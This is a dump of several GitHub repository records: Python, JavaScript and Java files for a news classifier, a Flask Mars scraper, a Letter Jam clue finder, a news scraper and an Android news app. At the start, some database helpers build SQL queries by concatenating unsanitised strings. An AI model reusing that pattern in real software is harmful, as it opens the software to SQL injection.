exe_update(conn, cur, sql)\n\n except Exception as e:\n print(e)\n\n\ndef get_sum(cur, data):\n \"\"\"\n 获得某个元素出现的总次数\n :param cur:\n :param data:\n :return:\n \"\"\"\n temp = -1\n try:\n sql = \"SELECT COUNT(content)FROM Train WHERE content='\" + data + \"'\"\n sum = exe_query(cur, sql)\n temp = \"\"\n for num in sum:\n temp = int(num[0])\n except Exception as e:\n print(e)\n temp = -1\n finally:\n return temp\n\n\ndef get_count(cur, data, target):\n \"\"\"\n 获得某个元素在不同条件下的出现次数\n :param cur:\n :param data:\n :param target:\n :return:\n \"\"\"\n count = []\n try:\n for i in range(len(target)):\n sql = \"SELECT COUNT(content)FROM Train WHERE content='\" + data + \"' AND result='\" + target[i] + \"'\"\n num = \"\"\n temp = exe_query(cur, sql)\n for en in temp:\n num = int(en[0])\n count.append(num)\n except Exception as e:\n print(e)\n count = []\n finally:\n return count\n\n\ndef get_element(cur, sentence):\n \"\"\"\n 获得一个句子的分词结果\n :param cur:\n :param sentence:\n :return:\n \"\"\"\n element = []\n try:\n sql = \"SELECT content FROM Test WHERE sentence_id=\" + str(sentence)\n temp = exe_query(cur, sql)\n for en in temp:\n element.append(str(en[0]))\n except Exception as e:\n print(e)\n element = []\n return element\n" } ]
4
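`control.py` in the record above passes already-segmented titles to `TfidfVectorizer` by giving it an identity tokenizer, then fits `MultinomialNB(alpha=0.1)`. A stripped-down sketch of that trick; the two sample titles and their label indices are invented placeholders for the NLPCC training data:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB

# Toy stand-ins for the word-segmented titles in train.txt:
# each document is already a list of tokens.
x_train = [["nba", "finals", "game"], ["stock", "market", "rally"]]
y_train = [7, 12]  # indices into the 18-entry target list (sports, finance)

# tokenizer=lambda doc: doc makes TF-IDF index each list as-is;
# lowercase=False stops it from trying to call .lower() on a list.
vec = TfidfVectorizer(tokenizer=lambda doc: doc, lowercase=False)
X = vec.fit_transform(x_train)

clf = MultinomialNB(alpha=0.1).fit(X, y_train)
print(clf.predict(vec.transform([["nba", "game", "tonight"]])))  # -> [7]
```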
Nickguild1993/Mission_to_mars
https://github.com/Nickguild1993/Mission_to_mars
8b3e20ebc60e95bba883c66b80f3747a212f5ccc
bcba51946b207004bd02cd215ecb9bedc81d4e82
986aed90fbeba08c03003a7ef4e23ee29936d4dd
refs/heads/master
2022-12-24T06:18:42.938943
2020-10-11T22:41:48
2020-10-11T22:41:48
299,718,582
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7151514887809753, "alphanum_fraction": 0.7190303206443787, "avg_line_length": 39.45098114013672, "blob_id": "193f138ea9300d040a820e7fca17a3817e6b77f6", "content_id": "1a37e523c4c829358ecaaff941dbe955a9899c02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4125, "license_type": "no_license", "max_line_length": 130, "num_lines": 102, "path": "/app.py", "repo_name": "Nickguild1993/Mission_to_mars", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask_pymongo import PyMongo \nimport scraping\n\n# first line: says we'll use Flask to render a template\n# second line: says we'll use PyMongo to interact w/ mongo database\n# third line: says that to use the scraping code, we will convert from jupyter notebook to python\n\napp = Flask(__name__)\n\n# Need to tell Python how to connect to Mongo use PyMongo. \n\n# Use flask_pymongo to set up mongo connection\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_app\"\nmongo = PyMongo(app)\n\n# app.config[\"MONGO_URI\"] -> tells Python that our app will connect to MONGO using a URI (uniform resource identifier)\n# that is similiar to a URL.\n\n# mongodb://localhost:27017/mars_app is the URI we'll be using to connect our app to MONGO.\n# This URI is saying that the app can reach Mongo through our localhost server, using port 27017\n# using a database we created -> mars_app\n\n# SET UP APP ROUTES\n\n# REWIND\n# Flask routes bind URLS to functions. For example, the URL \"ourpage.com/\" \n# brings us to the homepage of our web app.\n# the URL \"ourpage.com/scrape\" will activate our scraping code.\n\n\n# DEFINE THE ROUTE FOR THE HTML PAGE.\n\[email protected](\"/\")\ndef index():\n mars = mongo.db.mars.find_one()\n return render_template(\"index.html\", mars=mars)\n\n# This route: @app.route(\"/\") tells Flask what to display when we're looking at the \n# home page, index.html(index.html is the default HTML file that we'll use to display\n# content we've scraped). \n# This means that when we visit our web app's HTML page, we will see the home page.\n\n# within the ** def index(): ** function the following is accomplished:\n\n# mars = mongo.db.mars.find_one() ->\n# uses PyMongo to find the \"mars\" collection in our database, which we will create\n# when we convert our JUPYTER scaping code to Python Script. We will also assign that\n# path to the * mars * variable for use later.\n\n# return render_template(\"index.html\") : tells FLASK to return an HTML template using an index.html file.\n\n# we'll create this file after we build the FLASK routes.\n\n# , mars=mars) : tells Python to use the \"mars\" collection in MongoDB\n\n# This function is what links our visual representation of our work, our web app, to the code that powers it.\n\n\n# This next function wll set up our SCRAPING ROUTE. This route will be the \"button\" of the web application-\n# the one that will srape updated data when we tell it from the HOMEPAGE of our web app. It'll be tied to a button that will\n# run the code when it's clicked.\n\[email protected](\"/scrape\")\ndef scrape():\n mars = mongo.db.mars\n mars_data = scraping.scrape_all()\n mars.update({}, mars_data, upsert=True)\n return \"Scraping Successful!\"\n\n# What the above ROUTE is doing.\n\n# The 1st line: @app.route(\"/scrape\") -> defines the route that FLASK will be using. 
\n# this route, \"/scrape\" will run the function that we create just below it.\n\n# the next lines allow us to access the database, scrape new data using our SCRAPING.PY script, update the database,\n# and return a message when successful.\n\n# more detail:\n# we assign a new VARIABLE that points to our Mongo Database: mars = mongo.db.mars\n\n# next, we created a new variable to hold the newly scraped data: mars_data = scraping.scrape_all()\n# *** here we're referencing the * SCRAPE_ALL * function in the SCRAPING.PY file exported from Jupyter Notebook. ***\n\n# Now that we've gathered new data (via scraping) we need to update the database using: .update() \n# Syntax for .update() -> .update(query_parameter, data, options)\n\n# We're inserting data, so first we need to add an empty JSON object -> {} in place of the \"query_parameter\".\n\n# Next, we'll use the data we have stored in * mars_data * in place of \"data\".\n\n# finally, the OPTION we'll include is: upsert = True. -> this indicates to Mongo to create a new document if one doesn't already\n# exist, and new data will always be saved.\n\n# Last line of function -> return \"Scraping Successful\" to let us know it worked!\n\n\n\n# Now, the final bit of code we need to add -> tell Flask to run it.\n\nif __name__ == \"__main__\":\n app.run()" }, { "alpha_fraction": 0.7622067332267761, "alphanum_fraction": 0.7672796249389648, "avg_line_length": 174.22222900390625, "blob_id": "966fd7db6905bbb4ae1ca20a04bd6b6eeda559ed", "content_id": "d1973ab33c852bc41ee6b4b76eb2a8fca55a40d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1577, "license_type": "no_license", "max_line_length": 922, "num_lines": 9, "path": "/README.md", "repo_name": "Nickguild1993/Mission_to_mars", "src_encoding": "UTF-8", "text": "# Mission to Mars \n\nI just want to start this ReadME off by going over the issues I've had to deal with to complete this challenge. I know that my webpage isn't perfect but I have spent hours upon hours both by myself, in my tutoring time, and in office hours trying to get the webpage we were scraping the hemispheres from to work. I was locked out of the webpage twice which meant I was unable to access it. Everytime I'd try to run the ```scrape new data``` button and the function it calls, it would take at least 10 tries before it returned a successful scrape (the failed attempts were server disconnects because the webpage would fail to load). Getting this to work at leats 90% of how it's supposed to has been the single most frustrating experience I've had in the course. I apologize that it's not perfect, and believe me, I have *tried so hard* to make it as good as I can get it given the obstacles I have had to deal with. \n\nPlease refer to the (4) images i uploaded for proof that the website does indeed scrape the the hemisphere images and loads them on the webpage with their respective titles (although the best I could ever get was 3 to laod- the first image in the set displayed the ```alt_tag``` I put in my HTML because it wouldn't load). There is also the image of my webpage showing a successful scrape, and the last image is of the top of my webpage in case for whatever reason, that doens't load. \n\nAgain, I'm sorry it's not perfect, but I am at my wits end trying to work with a webpage that won't load properly, no matter what I do.\n\nMod 10\n" } ]
2
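`app.py` in the record above upserts the scraped dictionary with the legacy `collection.update()` call. A minimal sketch of the same step against a local MongoDB using the current `update_one` API; the `mars_data` dict is a stand-in for whatever `scraping.scrape_all()` returns:

```python
from pymongo import MongoClient

# Same connection the Flask app configures through MONGO_URI.
client = MongoClient("mongodb://localhost:27017")
mars = client.mars_app.mars

# Placeholder for the dictionary scraping.scrape_all() would return.
mars_data = {"news_title": "stub title", "news_paragraph": "stub text"}

# The empty filter {} matches whatever single document exists;
# upsert=True creates one on the first run, so /scrape can always
# overwrite the collection with fresh data.
mars.update_one({}, {"$set": mars_data}, upsert=True)
print(mars.find_one())
```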
jaafit/letterjam
https://github.com/jaafit/letterjam
9dbd54b70edc0c42565c44854356d3474c36a5ba
8b7499781aad2c3029f0959b046fb8448048ee0d
fed5699879a660247e7cc9f26fcc8cfa5823d563
refs/heads/master
2020-11-25T05:05:31.923433
2019-12-17T02:11:20
2019-12-17T02:11:20
228,513,551
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5239385962486267, "alphanum_fraction": 0.5401987433433533, "avg_line_length": 22.08333396911621, "blob_id": "c7ea3d3a8de87d34847e314491c3fe35e2645172", "content_id": "33baf64f57a0a5d701dd7e075502c087cf29c330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1107, "license_type": "no_license", "max_line_length": 51, "num_lines": 48, "path": "/makedict.py", "repo_name": "jaafit/letterjam", "src_encoding": "UTF-8", "text": "#!/bin/python2.7\nimport re\n\ndef bsearch(arr,element):\n start_index = 0\n last_index = len(arr)-1\n while (start_index <= last_index):\n mid =(int)(start_index+last_index)/2\n if (element>arr[mid]):\n start_index = mid+1\n elif (element<arr[mid]):\n last_index = mid-1\n elif (element == arr[mid]):\n return mid\n return -1\n\n\nwith open('TWL06.txt') as twl:\n dictionary = twl.readlines()\n\nfor i in range(len(dictionary)):\n dictionary[i] = dictionary[i].strip()\n\nthirtyk = []\nregex = re.compile(r'^([a-z]*)\\t.*\\n')\n\nwith open('count_1w.txt') as common:\n for line in common:\n\n line = regex.sub(r'\\1', line)\n if bsearch(dictionary, line.upper()) != -1:\n print line\n thirtyk.append(line)\n \n if len(thirtyk) >= 50000:\n break\n\nthirtyk.sort()\n\nwith open('mywords.json', 'w') as thelist:\n thelist.write('{\"words\":[')\n for i, line in enumerate(thirtyk):\n #print 'i',i\n if i:\n thelist.write(',')\n thelist.write('\"%s\"'%line)\n\n thelist.write(']}')" }, { "alpha_fraction": 0.5212895274162292, "alphanum_fraction": 0.5317822098731995, "avg_line_length": 25.413654327392578, "blob_id": "a966e77af46e7757c5bbe88627919cde62d362ed", "content_id": "a76793e0df0bd79120dce4756976531f13254dcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6576, "license_type": "no_license", "max_line_length": 83, "num_lines": 249, "path": "/letterjam.js", "repo_name": "jaafit/letterjam", "src_encoding": "UTF-8", "text": "var PLAYERCOUNT = 4\nfunction setPlayerCount(pc) {\n PLAYERCOUNT = pc\n}\n\nvar LJALPHABET = 'abcdefghiklmnoprstuwy'\nvar ALPHABET = 'abcdefghijklmnopqrstuvwxyz'\n\n\nfunction reqListener(e) {\n WORDS = JSON.parse(this.responseText);\n WORDS = WORDS.words\n window.localStorage.setItem('WORDS', JSON.stringify(WORDS))\n console.log('loaded')\n startgame()\n}\nvar WORDS = window.localStorage.getItem('WORDS')\nif (WORDS)\n WORDS = JSON.parse(WORDS)\nelse {\n var oReq = new XMLHttpRequest();\n oReq.onload = reqListener;\n oReq.open(\"get\", \"https://www.eatifketo.com/lj/mywords.json\", true);\n oReq.send();\n}\n\n\nvar counts = '4a 2b 3c 3d 6e 2f 2g 3h 4i 2k 3l 2m 3n 4o 2p 4r 4s 4t 3u 2w 2y'\ncounts = counts.split(' ')\nvar CARDS = []\ncounts.forEach(function(c) {\n for (var i = 0; i < c[0]; i++) {\n CARDS.push(c[1])\n }\n})\n\nfunction shuffle(a) {\n var j, x, i;\n for (i = a.length - 1; i > 0; i--) {\n j = Math.floor(Math.random() * (i + 1));\n x = a[i];\n a[i] = a[j];\n a[j] = x;\n }\n return a;\n}\n\n\nfunction haswild(w) {\n for (var c = 0; c < w.length; c++) {\n if (!~LETTERS.indexOf(w[c]))\n return true\n }\n return false\n}\nfunction hastoomanywilds(w) {\n var wild = false\n for (var c = 0; c < w.length; c++) {\n if (!~LETTERS.indexOf(w[c]) && w[c] !== wild) {\n if (!wild)\n wild = w[c]\n else\n return true\n }\n }\n return false\n}\nfunction includesAplayer(w) {\n for (var c = 0; c < w.length; c++)\n if (LETTERS.indexOf(w[c]) >= PLAYERCOUNT-2)\n return true\n return false\n}\nfunction bsearch(value) {\n var firstIndex = 
0,\n lastIndex = WORDS.length - 1,\n middleIndex = Math.floor((lastIndex + firstIndex)/2);\n\n while(WORDS[middleIndex] !== value && firstIndex < lastIndex)\n {\n if (value < WORDS[middleIndex])\n {\n lastIndex = middleIndex - 1;\n }\n else if (value > WORDS[middleIndex])\n {\n firstIndex = middleIndex + 1;\n }\n middleIndex = Math.floor((lastIndex + firstIndex)/2);\n }\n\n return (WORDS[middleIndex] !== value) ? -1 : middleIndex;\n}\nfunction isword(word, clue) {\n if (~word.indexOf('*')) { // has wild?\n for (var l = 0; l < ALPHABET.length; l++) {\n var subbed = word.replace(/\\*/g, LJALPHABET[l])\n if (~bsearch(subbed))\n return true\n if (subbed === clue) // we assume clue is also a valid word\n return true\n }\n return false\n }\n else\n return word === clue || ~bsearch(word)\n}\n\nfunction getleastambiguous(word, sofar) {\n\n if (sofar.length < word.length) { // are we still building this sequence?\n\n // find the next letter in the sequence that results in the least ambiguity\n var nextletter = word[sofar.length]\n var foundLetter = false\n var bestclue\n for (var i = 0; i < LETTERS.length; i++) {\n if (LETTERS[i] === nextletter) {\n foundLetter = true\n var thisclue = getleastambiguous(word, sofar.concat([i]))\n if (!bestclue || thisclue.unambiguity >= bestclue.unambiguity){\n bestclue = thisclue\n }\n }\n }\n if (foundLetter)\n return bestclue\n else {\n sofar.push(-1) // use wild\n return getleastambiguous(word, sofar)\n }\n }\n else { // sofar is a valid sequence\n var clue = {'sequence': sofar, 'unambiguity': 0, 'perspectives':{}}\n\n // score it\n for (var perspective = 0; perspective < PLAYERCOUNT-1; perspective++) {\n\n var hasMyLetter = false\n for (var s = 0; s < sofar.length; s++)\n if (sofar[s] === perspective)\n hasMyLetter = true\n if (!hasMyLetter)\n continue\n\n // go through each letter to see how many are valid\n clue.perspectives[perspective] = []\n\n for (var l = 0; l < LJALPHABET.length; l++) {\n var tryword = ''\n for (s = 0; s < clue.sequence.length; s++) {\n if (clue.sequence[s] === perspective)\n tryword += LJALPHABET[l]\n else if (clue.sequence[s] === -1)\n tryword += '*'\n else\n tryword += LETTERS[clue.sequence[s]]\n }\n\n if (isword(tryword, word)) {\n clue.perspectives[perspective].push(tryword)\n }\n }\n\n if (clue.perspectives[perspective].length)\n clue.unambiguity += 1/clue.perspectives[perspective].length\n }\n\n return clue\n }\n\n}\n\nfunction scoreclue(clueWord) {\n // count players used and npcs used\n var players = 0\n var npcs = 0\n var unusedPlayers = LETTERS.slice(0,PLAYERCOUNT-1)\n var unusedNpcs = LETTERS.slice(PLAYERCOUNT-1)\n for (var i = 0; i < clueWord.length; i++) {\n var pio = unusedPlayers.indexOf(clueWord[i])\n var npcio = unusedNpcs.indexOf(clueWord[i])\n if (~pio) {\n unusedPlayers.splice(pio,1)\n players++\n }\n else if (~npcio) {\n unusedNpcs.splice(npcio,1)\n npcs++\n }\n }\n\n // find optimal sequence for lowest ambiguity\n var clue = getleastambiguous(clueWord, [])\n clue.word = clueWord\n clue.players = players;\n clue.npcs = npcs\n clue.wild = haswild(clueWord)\n clue.score = clue.unambiguity\n clue.score += npcs * .1\n clue.score -= clue.wild ? 
.01 : 0\n return clue\n}\n\nvar CLUES = []\nvar LJcallback = {\n 'onFindClues': function() {}\n}\nfunction findclues() {\n if (!WORDS)\n return\n\n var valid = WORDS.filter(function(w) {\n return !hastoomanywilds(w) && includesAplayer(w)\n })\n console.log('scoring',valid.length,'clues')\n\n // score each clue\n var clues = valid.map(function(c) {\n return scoreclue(c)\n })\n\n // sort clues by score\n clues.sort(function(a,b) {\n return b.score - a.score\n })\n\n // print top 10\n CLUES = clues.slice(0,10)\n LJcallback.onFindClues()\n console.log('clues', CLUES)\n}\n\nvar STARTED = false\nvar LETTERS = []\nfunction startgame() {\n if (!WORDS || STARTED)\n return\n STARTED = true\n\n shuffle(CARDS)\n LETTERS = CARDS.slice(0,5)\n //LETTERS = ['c', 'l','u','e','s']\n \n // find valid clues\n findclues()\n\n}\nstartgame()" } ]
2
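Both `makedict.py` and `letterjam.js` in the record above hand-roll the same binary search over a sorted word list, and the Python version only floors its midpoint thanks to Python 2 integer division. A sketch of the same contract on top of the standard `bisect` module:

```python
from bisect import bisect_left

def bsearch(arr, element):
    """Index of element in sorted arr, else -1.

    Same contract as the bsearch helpers in makedict.py and
    letterjam.js, with bisect doing the halving instead of a
    manual low/high loop.
    """
    i = bisect_left(arr, element)
    return i if i < len(arr) and arr[i] == element else -1

words = ["clue", "jam", "letter", "wild"]
print(bsearch(words, "jam"), bsearch(words, "zebra"))  # 1 -1
```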
ky4910/KyNews
https://github.com/ky4910/KyNews
29ed7e80bc513cfcb41f1cd41a53c5117d9b90c2
d5ec61c7565c57abf231b6735c57412da1978e7c
b16fa18e4fff8ea3c41ab572a2e00d32d29c9a9a
refs/heads/master
2021-06-16T19:53:43.584551
2019-09-19T09:31:08
2019-09-19T09:31:08
146,187,984
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7512626051902771, "alphanum_fraction": 0.7626262903213501, "avg_line_length": 27.25, "blob_id": "cf83fd561b3f9d96b3a36478548929a850a4a4b6", "content_id": "a68b7a1eb515a3e4a6d13a1826ac5d611812ad43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 792, "license_type": "no_license", "max_line_length": 132, "num_lines": 28, "path": "/app/src/main/java/com/example/ky4910/kynews/view/fragment/MusicFragment.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.view.fragment;\n\nimport android.os.Bundle;\nimport android.support.annotation.NonNull;\nimport android.support.annotation.Nullable;\nimport android.support.v4.app.Fragment;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\n\nimport com.example.ky4910.kynews.R;\n\npublic class MusicFragment extends Fragment {\n\n public MusicFragment() {\n }\n\n @Override\n public void onCreate(@Nullable Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n }\n\n @Nullable\n @Override\n public View onCreateView(@NonNull LayoutInflater inflater, @Nullable ViewGroup container, @Nullable Bundle savedInstanceState) {\n return inflater.inflate(R.layout.fragment_music, container, false);\n }\n}\n\n" }, { "alpha_fraction": 0.6677966117858887, "alphanum_fraction": 0.6745762825012207, "avg_line_length": 27.731706619262695, "blob_id": "8d98681e01c003c1db9cf762edbfaed65c1834c6", "content_id": "68706057d1524554066a848927fbda6580bb2ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1282, "license_type": "no_license", "max_line_length": 109, "num_lines": 41, "path": "/otherUsage/qqNews.py", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\n#import pymssql\n\n#推荐 https://new.qq.com/ch/rec/\n#体育 https://new.qq.com/ch/sports/\n#财经 https://new.qq.com/ch/finance/\n#军事 https://new.qq.com/ch/milite/\n#科技 https://new.qq.com/ch/tech/\n#娱乐 https://new.qq.com/ch/ent/\n#汽车 https://new.qq.com/ch/auto/\n\nurl = \"https://news.qq.com/\"\n#请求腾讯新闻URL,获取text文本\nwbdata = requests.get(url).text\nsoup = BeautifulSoup(wbdata, 'lxml')\n\n#分别获取要问,财经,娱乐新闻信息\nmajor_titles = soup.select(\"div.item.major > div.Q-tpList > div.Q-tpWrap > div.text > em.f14 > a.linkto\")\nfinance_titles = soup.select(\"div.item.finance > div.Q-tpList > div.Q-tpWrap > div.text > em.f14 > a.linkto\")\nent_titles = soup.select(\"div.item.ent > div.Q-tpList > div.Q-tpWrap > div.text > em.f14 > a.linkto\")\n\n#定义列表数组\nnews_titles = {'major':major_titles, 'finance':finance_titles, 'entertainment':ent_titles}\n\n\nfor key, value in news_titles.items():\n\tprint(\"the index\" + key) \n\tfor n in value:\n\t\ttitle = n.get_text()\n\t\tlink = n.get(\"href\")\n\t\tdata = {'标题':title, '链接':link}\n\t\ttry:\n\t\t\tprint(data)\n\t\texcept UnicodeEncodeError:\n\t\t\tprint(\"cannot print this string!\")\n\tprint('')\n\nprint ('connecting to MySQL Server...')\n\n\n" }, { "alpha_fraction": 0.6194225549697876, "alphanum_fraction": 0.6395450830459595, "avg_line_length": 27.575000762939453, "blob_id": "b3b67bf9ce8704d0c496b48a6e878048fdbbf83a", "content_id": "dfcbbeb301bf33d393326771bdb32d108cf51750", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 83, "num_lines": 40, "path": 
"/app/src/main/java/com/example/ky4910/kynews/adapter/NewsFragmentPageAdapter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.adapter;\n\nimport android.support.v4.app.Fragment;\nimport android.support.v4.app.FragmentManager;\nimport android.support.v4.app.FragmentPagerAdapter;\n\nimport com.example.ky4910.kynews.view.fragment.NewsTypeFragment.SportsNewsFragment;\nimport com.example.ky4910.kynews.view.fragment.NewsTypeFragment.TechNewsFragment;\nimport com.example.ky4910.kynews.view.fragment.NewsTypeFragment.MainNewsFragment;\n\npublic class NewsFragmentPageAdapter extends FragmentPagerAdapter {\n\n public NewsFragmentPageAdapter(FragmentManager fm) {\n super(fm);\n }\n\n @Override\n public Fragment getItem(int position) {\n Fragment fragment = null;\n switch (position) {\n case 0:\n fragment = new MainNewsFragment();\n break;\n case 1:\n fragment = new SportsNewsFragment();\n break;\n case 2:\n fragment = new TechNewsFragment();\n break;\n default:\n break;\n }\n return fragment;\n }\n\n @Override\n public int getCount() {\n return 3;\n }\n}\n" }, { "alpha_fraction": 0.730088472366333, "alphanum_fraction": 0.7654867172241211, "avg_line_length": 36.66666793823242, "blob_id": "d5fbc7be6a31037b5bf4f04088d687be8237430b", "content_id": "609f598436a0cab385b57a1614b2da9ca4329708", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 144, "num_lines": 6, "path": "/README.md", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "# KyNews\nThe news client developed by kimber\n\nImitate parts of Tencent News APP\n\n![image](https://github.com/ky4910/KyNews/blob/master/Gif/GIF_News.gif) ![image](https://github.com/ky4910/KyNews/blob/master/Gif/GIF_Video.gif)\n" }, { "alpha_fraction": 0.6611804962158203, "alphanum_fraction": 0.6677071452140808, "avg_line_length": 34.95918273925781, "blob_id": "53604a5e8db54081b5804fbb843d26af2d798292", "content_id": "9bf8858c3e52f2c68ade27ac5984576db8d93eeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3534, "license_type": "no_license", "max_line_length": 102, "num_lines": 98, "path": "/app/src/main/java/com/example/ky4910/kynews/adapter/TechNewsRvAdapter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.adapter;\n\nimport android.content.Context;\nimport android.support.annotation.NonNull;\nimport android.support.v7.widget.RecyclerView;\nimport android.util.Log;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.ImageView;\nimport android.widget.TextView;\n\nimport com.bumptech.glide.Glide;\nimport com.bumptech.glide.request.RequestOptions;\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.model.entity.NewsBean;\nimport com.example.ky4910.kynews.utils.PubtimeConverter;\n\nimport java.util.List;\n\nimport butterknife.BindView;\nimport butterknife.ButterKnife;\n\npublic class TechNewsRvAdapter extends RecyclerView.Adapter<TechNewsRvAdapter.ViewHolder> {\n\n private Context mContext;\n private List<NewsBean.DataBean.ListBean> listBeans;\n private LayoutInflater mLayoutInflater;\n private OnItemClickListener mOnItemClickListener;\n\n public interface OnItemClickListener {\n void onItemClicked(View view, int position);\n }\n\n public void setOnItemClickListener(OnItemClickListener clickListener) 
{\n this.mOnItemClickListener = clickListener;\n }\n\n public TechNewsRvAdapter(Context context, List<NewsBean.DataBean.ListBean> listBeans) {\n this.mContext = context;\n this.listBeans = listBeans;\n mLayoutInflater = LayoutInflater.from(context);\n }\n\n @NonNull\n @Override\n public ViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {\n View view = mLayoutInflater.inflate(R.layout.news_item, null);\n ViewHolder viewHolder = new ViewHolder(view, mOnItemClickListener);\n return viewHolder;\n }\n\n @Override\n public void onBindViewHolder(@NonNull ViewHolder holder, int position) {\n NewsBean.DataBean.ListBean listBean = listBeans.get(position);\n RequestOptions options = new RequestOptions()\n .placeholder(R.drawable.default_img)\n .error(R.drawable.default_img)\n .override(336, 210);\n Glide.with(mContext).load(listBean.getHeadpic()).apply(options).into(holder.imageView);\n holder.textTitle.setText(listBean.getTitle());\n Log.i(\"kimber\", \"pubTime is \" + listBean.getPub_time() + \"\\n\"\n + \"title is \" + listBean.getTitle());\n String realTime = PubtimeConverter.pubtimeToDate(String.format(\"%s\", listBean.getPub_time()));\n holder.textTime.setText(realTime);\n }\n\n @Override\n public int getItemCount() {\n return listBeans.size();\n }\n\n public static class ViewHolder extends RecyclerView.ViewHolder {\n @BindView(R.id.news_image)\n ImageView imageView;\n @BindView(R.id.news_title)\n TextView textTitle;\n @BindView(R.id.news_time)\n TextView textTime;\n\n public ViewHolder(View itemView, final OnItemClickListener onClickListener) {\n super(itemView);\n itemView.setOnClickListener(new View.OnClickListener(){\n @Override\n public void onClick(View view) {\n if (onClickListener != null) {\n int position = getAdapterPosition();\n //确保position值有效\n if (position != RecyclerView.NO_POSITION) {\n onClickListener.onItemClicked(view, position);\n }\n }\n }\n });\n ButterKnife.bind(this, itemView);\n }\n }\n}\n" }, { "alpha_fraction": 0.653605043888092, "alphanum_fraction": 0.6692789793014526, "avg_line_length": 30.899999618530273, "blob_id": "8a1e74cc9b631a8e66069aa538fac9f3a8a1b4a6", "content_id": "ab41e0a0cf412ffa7c98d2ea2df75f0d48cb9318", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 666, "license_type": "no_license", "max_line_length": 89, "num_lines": 20, "path": "/app/src/main/java/com/example/ky4910/kynews/utils/PubtimeConverter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.utils;\n\nimport java.text.SimpleDateFormat;\nimport java.util.Date;\nimport java.util.Locale;\n\npublic class PubtimeConverter {\n\n /* Genymotion模拟器的时间戳转换会出现偏差(About 12 hours) */\n public static String pubtimeToDate(String s) {\n String res;\n SimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"yyyy-MM-dd HH:mm:ss\",\n Locale.ENGLISH);\n long lt = Long.valueOf(s);\n res = simpleDateFormat.format(new Date(Long.parseLong(String.valueOf(lt*1000))));\n //Date date = new Date(lt);\n //res = simpleDateFormat.format(date);\n return res;\n }\n}\n" }, { "alpha_fraction": 0.7042156457901001, "alphanum_fraction": 0.713890790939331, "avg_line_length": 33.4523811340332, "blob_id": "e4f13475cedaac2f89e36f9fc5611f878cc4f300", "content_id": "30b4020ebd916758370b42937fd5fcdfb4f94835", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2894, "license_type": "no_license", "max_line_length": 102, "num_lines": 84, "path": 
"/app/src/main/java/com/example/ky4910/kynews/adapter/VideoRvAdapter.java", "repo_name": "ky4910/KyNews", "src_encoding": "UTF-8", "text": "package com.example.ky4910.kynews.adapter;\n\nimport android.content.Context;\nimport android.support.annotation.NonNull;\nimport android.support.v7.widget.RecyclerView;\nimport android.util.Log;\nimport android.view.LayoutInflater;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.widget.LinearLayout;\nimport android.widget.TextView;\n\nimport com.example.ky4910.kynews.R;\nimport com.example.ky4910.kynews.model.entity.VideoBean;\nimport com.example.ky4910.kynews.utils.KyVideoPlayer;\nimport com.example.ky4910.kynews.utils.KyVideoPlayerController;\nimport com.example.ky4910.kynews.utils.VideoUtil;\n\nimport java.util.List;\n\nimport butterknife.BindView;\nimport butterknife.ButterKnife;\n\npublic class VideoRvAdapter extends RecyclerView.Adapter<VideoRvAdapter.MyViewHolder> {\n\n private Context mContext;\n private List<VideoBean> videosBeanList;\n\n public static final String TAG = \"VIDEO_RV_ADAPTER\";\n\n public VideoRvAdapter(Context context, List<VideoBean> videoBeans) {\n this.mContext = context;\n this.videosBeanList = videoBeans;\n }\n\n @NonNull\n @Override\n public MyViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {\n View itemView = LayoutInflater.from(mContext).inflate(R.layout.video_item, null);\n MyViewHolder myViewHolder = new MyViewHolder(itemView);\n KyVideoPlayerController videoController = new KyVideoPlayerController(mContext);\n try {\n myViewHolder.setController(videoController);\n } catch (Exception e){\n Log.e(TAG, e.getMessage());\n }\n\n return myViewHolder;\n }\n\n @Override\n public void onBindViewHolder(@NonNull MyViewHolder holder, int position) {\n holder.bindData(videosBeanList.get(position));\n }\n\n @Override\n public int getItemCount() {\n return videosBeanList.size();\n }\n\n class MyViewHolder extends RecyclerView.ViewHolder{\n\n private KyVideoPlayer mVideoPlayer;\n private KyVideoPlayerController mVideoController;\n\n private MyViewHolder(View itemView) {\n super(itemView);\n mVideoPlayer = 